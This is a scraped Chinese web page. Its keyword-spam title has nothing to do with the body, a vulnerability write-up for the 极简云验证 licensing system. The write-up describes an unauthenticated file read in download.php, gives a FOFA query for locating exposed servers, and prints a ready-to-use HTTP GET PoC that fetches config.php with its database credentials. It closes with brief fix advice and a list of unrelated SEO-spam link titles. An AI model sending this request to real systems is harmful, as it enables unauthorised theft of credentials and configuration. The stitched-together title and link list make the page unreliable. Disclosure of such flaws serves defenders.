当前位置: 首页 > news >正文

杭州专业制作网站wordpress博客福利网整站源码

杭州专业制作网站,wordpress博客福利网整站源码,技能培训,杭州网络0x01 产品简介 极简云验证是一款开源的网络验证系统,支持多应用卡密生成:卡密生成 单码卡密 次数卡密 会员卡密 积分卡密、卡密管理 卡密长度 卡密封禁 批量生成 批量导出 自定义卡密前缀等;支持多应用多用户管理:应用备注 应用版…

0x01 产品简介

极简云验证是一款开源的网络验证系统,支持多应用卡密生成:卡密生成 单码卡密 次数卡密 会员卡密 积分卡密、卡密管理 卡密长度 卡密封禁 批量生成 批量导出 自定义卡密前缀等;支持多应用多用户管理:应用备注 应用版本 多级代理价格 免费付费切换 验证用户IP 验证用户设备 应用开关等

0x02 漏洞概述

极简云验证 download.php 接口处存在文件读取漏洞,未经身份验证的攻击者可以利用此漏洞读取系统内部配置文件,数据库账号密码等敏感信息,使系统处于极不安全的状态。

0x03 复现环境

FOFA: "../assets/img/bg/logo_white.png"

0x04 漏洞复现

PoC

GET /download.php?file=20b6cb088a8d5c444074&filename=config.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close

0x05 修复建议

关闭互联网暴露面或接口设置访问权限

升级至安全版本

http://www.yayakq.cn/news/513393/

相关文章:

  • 网站建设需要大约多少钱嘉祥网站建设哪家好
  • 做化工贸易要用那些网站推广wordpress分类目录管理404
  • 宁波住房和城乡建设培训网站设计素材免费下载网站有哪些
  • 旅游主题网站模板广州企业网
  • 网站备案撤销怎么办徐汇网站建设
  • 做网站是用什么软件做付费软件网站
  • 重庆网站建设公司模板中国能源建设集团有限公司是央企
  • 建设茶叶网站目的联合办公空间
  • 网络推广案例楚雄seo
  • 大庆 网站建设东莞想做网站
  • 具有品牌的福州网站建设免费推客推广平台
  • 东丽做网站公司装修案例视频
  • 国际外贸网站建设wordpress ie6 内核
  • 做瞹瞹嗳免费网站在线观看建立公司企业网站
  • 东莞建网页官网推广方案seo
  • 什么网站可以做期刊封面邯郸在哪个省
  • 外国扁平化网站卖源码的网站
  • 连云港建设网站公司logo设计在线制作
  • wordpress华为北京做的好的seo公司
  • 永州网站建设哪家好有关游戏的网站建设规划书
  • 北京建设网站的公司wordpress侧边栏图片
  • 网站规划名词解释如何加强网站建设
  • 公司做网站费用高权重网站收录问题
  • 常德天恒建设网站什么是seo什么是sem
  • 网页设计dw实训报告昆明网站排名优化公司哪家好
  • 哈尔滨网站建设乙薇中国最大的网站制作公司
  • 网站关键词 提醒域名注册的网站
  • 广州手机网站建设制作网站用什么软件好
  • 机关建设网站龙华做棋牌网站建设哪家好
  • 用html5做的音乐网站池州网站开发